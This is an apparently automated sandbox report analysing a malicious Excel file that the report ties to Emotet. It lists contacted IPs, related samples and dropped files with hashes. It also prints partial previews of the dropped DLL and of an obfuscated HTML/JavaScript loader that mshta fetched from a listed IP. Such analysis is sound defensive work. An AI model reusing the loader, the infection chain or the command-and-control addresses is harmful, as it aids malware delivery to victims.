                                  		unknownFrance
                                  		16276OVHFRtrue
                                  45.118.135.203
                                  		unknownJapan63949LINODE-APLinodeLLCUStrue
                                  50.116.54.215
                                  		unknownUnited States
                                  		63949LINODE-APLinodeLLCUStrue
                                  131.100.24.231
                                  		unknownBrazil
                                  		61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                                  46.55.222.11
                                  		unknownBulgaria
                                  		34841BALCHIKNETBGtrue
                                  41.76.108.46
                                  		unknownSouth Africa
                                  		327979DIAMATRIXZAtrue
                                  173.212.193.249
                                  		unknownGermany
                                  		51167CONTABODEtrue
                                  45.176.232.124
                                  		unknownColombia
                                  		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                  178.79.147.66
                                  		unknownUnited Kingdom
                                  		63949LINODE-APLinodeLLCUStrue
                                  212.237.5.209
                                  		unknownItaly
                                  		31034ARUBA-ASNITtrue
                                  162.243.175.63
                                  		unknownUnited States
                                  		14061DIGITALOCEAN-ASNUStrue
                                  176.104.106.96
                                  		unknownSerbia
                                  		198371NINETRStrue
                                  207.38.84.195
                                  		unknownUnited States
                                  		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                  164.68.99.3
                                  		unknownGermany
                                  		51167CONTABODEtrue
                                  164.90.147.135
                                  		hostfeeling.comUnited States
                                  		14061DIGITALOCEAN-ASNUStrue
                                  192.254.71.210
                                  		unknownUnited States
                                  		64235BIGBRAINUStrue
                                  212.237.56.116
                                  		unknownItaly
                                  		31034ARUBA-ASNITtrue
                                  104.168.155.129
                                  		unknownUnited States
                                  		54290HOSTWINDSUStrue
                                  45.142.114.231
                                  		unknownGermany
                                  		44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                  203.114.109.124
                                  		unknownThailand
                                  		131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                  209.59.138.75
                                  		unknownUnited States
                                  		32244LIQUIDWEBUStrue
                                  159.8.59.82
                                  		unknownUnited States
                                  		36351SOFTLAYERUStrue
                                  129.232.188.93
                                  		unknownSouth Africa
                                  		37153xneeloZAtrue
                                  91.240.118.172
                                  		unknownunknown
                                  		49453GLOBALLAYERNLtrue
                                  58.227.42.236
                                  		unknownKorea Republic of
                                  		9318SKB-ASSKBroadbandCoLtdKRtrue
                                  158.69.222.101
                                  		unknownCanada
                                  		16276OVHFRtrue
                                  104.251.214.46
                                  		unknownUnited States
                                  		54540INCERO-HVVCUStrue

                                  General Information

                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:562403
                                  Start date:28.01.2022
                                  Start time:21:00:39
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 12m 0s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:imedpub_6.xls
                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Number of analysed new started processes analysed:17
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winXLS@21/12@2/48
                                  EGA Information:
                                  • Successful, ratio: 71.4%
                                  HDC Information:
                                  • Successful, ratio: 18.7% (good quality ratio 15.8%)
                                  • Quality average: 65.4%
                                  • Quality standard deviation: 33%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 56
                                  • Number of non-executed functions: 197
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .xls
                                  • Changed system and user locale, location and keyboard layout to English - United States
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Scroll down
                                  • Close Viewer

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 92.123.101.210, 92.123.101.211, 92.123.101.225, 92.123.101.179
                                  • Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
                                  • Execution Graph export aborted for target mshta.exe, PID 1996 because there are no executed function
                                  • Execution Graph export aborted for target powershell.exe, PID 2576 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  21:01:21API Interceptor57x Sleep call for process: mshta.exe modified
                                  21:01:25API Interceptor443x Sleep call for process: powershell.exe modified
                                  21:02:02API Interceptor149x Sleep call for process: rundll32.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  195.154.133.20imedpub.com_6.xlsGet hashmaliciousBrowse
                                    imedpub.com_10.xlsGet hashmaliciousBrowse
                                      iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                        iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                          iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                            NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                              iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                  iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                    iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                      iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                        imedpub.xlsGet hashmaliciousBrowse
                                                          InnovincConf_1.xlsGet hashmaliciousBrowse
                                                            innovinc.org.xlsGet hashmaliciousBrowse
                                                              ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                  Innovincconferences.xlsGet hashmaliciousBrowse
                                                                    zb.dllGet hashmaliciousBrowse
                                                                      9vn5uo9AGs0AM.dllGet hashmaliciousBrowse
                                                                        irtW.dllGet hashmaliciousBrowse
                                                                          185.157.82.211imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                            imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                              iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                  iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                    NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                      iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                        iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                          iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                            iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                              iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                imedpub.xlsGet hashmaliciousBrowse
                                                                                                  InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                    innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                      ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                        Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                          Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                            zb.dllGet hashmaliciousBrowse
                                                                                                              9vn5uo9AGs0AM.dllGet hashmaliciousBrowse
                                                                                                                irtW.dllGet hashmaliciousBrowse

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                  jurnalpjf.lan.go.idimedpub_8.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  Opast International.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  iMedPub LTD.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  opastonline.com.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  Insight Medical Publishing_1.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  Insight Medical Publishing_2.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  Insight Medical Publishing_6.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  Insight Medical Publishing.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  OMICS International.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  SecuriteInfo.com.X97M.DownLoader.901.32695.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  omicsonline.net.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  OMICS Online_3.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  OMICS Publishing Group.xlsGet hashmaliciousBrowse
                                                                                                                  • 103.206.244.105
                                                                                                                  hostfeeling.comimedpub_8.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  Opast International.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  iMedPub LTD.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  opastonline.com.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  Insight Medical Publishing_1.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  Insight Medical Publishing_2.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  Insight Medical Publishing_6.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  Insight Medical Publishing.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  OMICS International.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  SecuriteInfo.com.X97M.DownLoader.901.32695.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  omicsonline.net.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  OMICS Online_3.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  OMICS Publishing Group.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  Opast Publishing Group_2.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135
                                                                                                                  396439556866528615169447.xlsGet hashmaliciousBrowse
                                                                                                                  • 164.90.147.135

                                                                                                                  ASNs

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                  S-NET-ASPLimedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  imedpub.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  zb.dllGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  9vn5uo9AGs0AM.dllGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  irtW.dllGet hashmaliciousBrowse
                                                                                                                  • 185.157.82.211
                                                                                                                  OnlineSASFRimedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  imedpub.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  info_301.xlsGet hashmaliciousBrowse
                                                                                                                  • 195.154.146.35
                                                                                                                  InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  zb.dllGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22
                                                                                                                  9vn5uo9AGs0AM.dllGet hashmaliciousBrowse
                                                                                                                  • 51.15.4.22

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\ProgramData\JooSee.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):548864
                                                                                                                  Entropy (8bit):6.980518796737633
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:B2AavzUBPSczbeeTLjvNyMwWd3DYr6i64/:OUBPSczbeeTnvhZDWA
                                                                                                                  MD5:8A6FB79B56B4C5F45322AAA8150C5E36
                                                                                                                  SHA1:09453D0478D6725C5ECFBD1644CCC156811F0A6C
                                                                                                                  SHA-256:DCC5DFE8C7150DD55E2F22EEBAE19F04EFAFA214DC7E1366A0CF4CCC7E616119
                                                                                                                  SHA-512:2F06489632ADEA7B67D544B3B0491B78AEE29F3C91B38251445ABA70CAF148EF6A1ADCC4158C1B85DC9F2036F790A2AF9622DDF7F3FF85D67A19B87BC5BA7F4F
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61414
                                                                                                                  Entropy (8bit):7.995245868798237
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                                  MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                                  SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                                  SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                                  SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                                  Malicious:false
                                                                                                                  Preview:MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  File Type:data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):328
                                                                                                                  Entropy (8bit):3.104167099933915
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:kKbKk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:u9kPlE99SNxAhUeYlUSA/t
                                                                                                                  MD5:95F4F0C11185412D12B65919895BDB4E
                                                                                                                  SHA1:10F9F4BBF444E04A5B5D106B9FD93AB5E7D811C3
                                                                                                                  SHA-256:343826616ADD89B2917DFB50478FB429999FD64CBE8052DDEC6ACE8A2F9A5B5C
                                                                                                                  SHA-512:D02D1F22B3C499EF2ACC3719F7E0B40DD09D47EB0F9F61FBCCF8AF4A1D38AB17942DED75B181A14206D914FC12D1E483CE86C5E520DE772F18D1E3B084798BE8
                                                                                                                  Malicious:false
                                                                                                                  Preview:p...... ........;s.:....(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                  File Type:data
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):11054
                                                                                                                  Entropy (8bit):6.200485074224619
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
                                                                                                                  MD5:DD20B97330028BCB6BF98D97C47028D9
                                                                                                                  SHA1:D58D97589A97FBD3B1216ED76C4918113F4B7B25
                                                                                                                  SHA-256:4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
                                                                                                                  SHA-512:AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
                                                                                                                  Malicious:false
                                                                                                                  IE Cache URL:http://91.240.118.172/gg/ff/fe.html
                                                                                                                  Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'}..\\.1.6.2.%.2.0}

                                                                                                                  C:\Users\user\AppData\Local\Temp\4173.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1536
                                                                                                                  Entropy (8bit):1.1464700112623651
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                  Malicious:false
                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\CabFBE6.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):61414
                                                                                                                  Entropy (8bit):7.995245868798237
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                                  MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                                  SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                                  SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                                  SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                                  Malicious:false
                                                                                                                  Preview:MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF493D2E47BBB482A7.TMP

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):28672
                                                                                                                  Entropy (8bit):3.5189161831469296
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
                                                                                                                  MD5:06A30014EFAE12913C829BE85DD271EC
                                                                                                                  SHA1:D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
                                                                                                                  SHA-256:2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
                                                                                                                  SHA-512:E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
                                                                                                                  Malicious:false
                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF958AA1C6F3D6D4C6.TMP

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):512
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3::
                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
